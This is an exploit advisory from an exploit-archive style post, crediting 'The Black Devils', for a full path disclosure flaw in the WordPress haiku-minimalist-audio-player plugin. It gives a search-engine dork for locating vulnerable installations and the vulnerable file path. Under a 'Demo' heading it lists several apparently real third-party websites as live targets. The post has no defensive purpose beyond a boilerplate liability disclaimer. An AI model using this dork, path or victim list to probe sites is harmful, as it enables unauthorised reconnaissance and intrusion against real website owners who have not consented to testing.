# Exploit Title: Wordpress haiku-minimalist-audio-player plugin Full Path Disclosure vulnerability
# Date: 08/01/2012
# Author: The Black Devils
# Category : [ webapps ]
# Vendor : http://wordpress.org/extend/plugins/haiku-minimalist-audio-player/
# Type : php
# Tested on: [Windows] & [Ubuntu]
# Dork : inurl:"/plugins/haiku-minimalist-audio-player"
#------------------
http://localhost/wp-content/plugins/haiku-minimalist-audio-player/haiku-player.php
Demo
http://100showrooms.cl/wp-content/plugins/haiku-minimalist-audio-player/haiku-player.php
http://www.allthatjazz.fr/wp-content/plugins/haiku-minimalist-audio-player/haiku-player.php
http://larylambert.fr/wp-content/plugins/haiku-minimalist-audio-player/haiku-player.php
http://www.samples.fr/blog/wp-content/plugins/haiku-minimalist-audio-player/haiku-player.php
http://acsbe.asso.fr/wp-content/plugins/haiku-minimalist-audio-player/haiku-player.php
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information